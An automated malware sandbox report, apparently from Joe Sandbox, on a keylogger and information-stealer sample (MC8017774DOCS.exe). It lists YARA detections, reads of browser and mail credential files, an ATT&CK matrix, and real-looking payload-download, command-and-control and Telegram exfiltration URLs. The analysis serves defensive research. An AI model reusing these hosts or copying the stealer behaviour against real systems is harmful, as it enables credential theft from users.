                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		11
                    Masquerading                    		1
                    OS Credential Dumping                    		21
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                    Process Injection                    		1
                    Disable or Modify Tools                    		LSASS Memory31
                    Virtualization/Sandbox Evasion                    		Remote Desktop Protocol11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		31
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Application Window Discovery                    		SMB/Windows Admin Shares1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Access Token Manipulation                    		NTDS1
                    System Network Configuration Discovery                    		Distributed Component Object Model1
                    Clipboard Data                    		4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                    Process Injection                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeylogging15
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Deobfuscate/Decode Files or Information                    		Cached Domain Credentials215
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Obfuscated Files or Information                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    MC8017774DOCS.exe42%ReversingLabsWin32.Trojan.GuLoader
                    MC8017774DOCS.exe49%VirustotalBrowse
                    MC8017774DOCS.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll3%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin0%Avira URL Cloudsafe
                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binW0%Avira URL Cloudsafe
                    http://the.drillmmcsnk.top/den/P4.php0%Avira URL Cloudsafe
                    http://the.drillmmcsnk.top0%Avira URL Cloudsafe
                    http://the.drillmmcsnk.top/den/api.php0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mertvinc.com.tr
                    		185.244.144.68
                    		truefalse
                      		high
                      reallyfreegeoip.org
                      		172.67.177.134
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          the.drillmmcsnk.top
                          		5.182.211.149
                          		truefalse
                            		unknown
                            checkip.dyndns.com
                            		132.226.8.169
                            		truefalse
                              		high
                              checkip.dyndns.org
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://the.drillmmcsnk.top/den/P4.phpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://reallyfreegeoip.org/xml/8.46.123.75false
                                  		high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    		high
                                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://checkip.dyndns.org/false
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F4E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabMC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.orgMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoMC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/botMC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://chrome.google.com/webstore?hl=enHMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F18000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binWMC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.office.com/lBMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.office.com/HMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.ftp.ftp://ftp.gopher.MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                            		high
                                                            http://checkip.dyndns.orgMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorErrorMC8017774DOCS.exefalse
                                                                  		high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://chrome.google.com/webstore?hl=enMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F1D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://the.drillmmcsnk.topMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://varders.kozow.com:8081MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://aborters.duckdns.org:8081MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdMC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                		high
                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20aMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://51.38.247.67:8081/_send_.php?LMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://anotherarmy.dns.army:8081MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.org/xml/8.46.123.75$MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DA8000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://checkip.dyndns.org/qMC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                              		high
                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdMC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                                		high
                                                                                                https://reallyfreegeoip.orgMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://the.drillmmcsnk.top/den/api.phpMC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
